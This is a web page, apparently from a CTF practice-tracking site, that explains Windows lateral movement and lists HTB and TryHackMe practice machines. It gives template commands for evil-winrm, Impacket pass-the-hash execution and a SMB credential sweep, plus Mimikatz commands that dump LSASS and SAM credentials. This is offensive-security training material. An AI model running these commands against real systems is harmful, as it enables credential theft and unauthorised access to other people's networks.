ZeroBox

Windows Lateral Movement: practice machines and key commands

Lateral movement means using credentials or hashes from one host to reach another. On Windows the common channels are WinRM, SMB with PsExec style execution, WMI, DCOM and RDP, and each needs a different port and privilege level. A recovered NTLM hash can be used directly with pass-the-hash, so you do not always need the plaintext password. Credential material comes from LSASS memory, the SAM and SYSTEM hives, NTDS.dit, configuration files and browser stores. Spray carefully to avoid lockouts and map which accounts are local administrators on which hosts. Pivoting often goes hand in hand with lateral movement when the next hosts sit on another subnet. These boxes demonstrate moving across Windows hosts. Log every hop with the account, host and method used so you can retrace your path.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

Evil-WinRM Remote PowerShell Access

Connect to Windows target over WinRM port 5985 with credentials or Pass-The-Hash.

evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scripts

Impacket WMIExec (Pass-The-Hash)

Execute semi-interactive commands over WMI using NTLM hash without knowing plaintext password.

impacket-wmiexec -hashes :{NTLM_HASH} {USER}@{TARGET_IP}

Impacket PSExec (Pass-The-Hash as SYSTEM)

Spawn SYSTEM service shell on target using NTLM hash over SMB port 445.

impacket-psexec -hashes :{NTLM_HASH} Administrator@{TARGET_IP}

Mimikatz LogonPasswords LSASS Dump

Dump plaintext passwords and NTLM hashes from memory of LSASS process.

privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::lsa /patch

NetExec / CrackMapExec Domain Sweep

Check SMB credentials validity, local admin status (Pwn3d!), and password policies.

nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --shares

Keep going

Windows Lateral Movement machines (12)

2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 11 Windows, 1 Linux.

Very Easy (1)

MachinePlatformOSTags
ExplosionHTBWindowsRDP, Remote Desktop, Default Credentials

Easy (5)

MachinePlatformOSTags
ResponderHTBWindowsLFI, WinRM, Responder
AnthemTHMWindowsUmbraco-CMS, RDP, OSINT
IceTHMWindowsOSCP, Icecast, CVE-2004-1561, Mimikatz
SaunaHTBWindowsAS-REP Roasting, ASREPRoasting-Attack, Active Directory, BloodHound
SpectraHTBLinuxFile-System-Permissions, HTB, Lateral-Movement, Sudo

Medium (3)

MachinePlatformOSTags
BlasterTHMWindowsRDP, CVE-2019-1388, UAC-Bypass
Exploiting Active DirectoryTHMWindowsActive Directory, Kerberoasting, ASREPRoasting, Pass-the-Hash
Lateral Movement and PivotingTHMWindowsActive Directory, Pivoting, Lateral Movement, WMI

Hard (3)

MachinePlatformOSTags
Active Directory TrustsTHMWindowsActive Directory, Domain Trusts, SID History, Trust Abuse
HoloTHMWindowsActive Directory, Multi-Host, Kerberos, BloodHound
RetroTHMWindowsWordPress, RDP, CVE-2019-1388

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox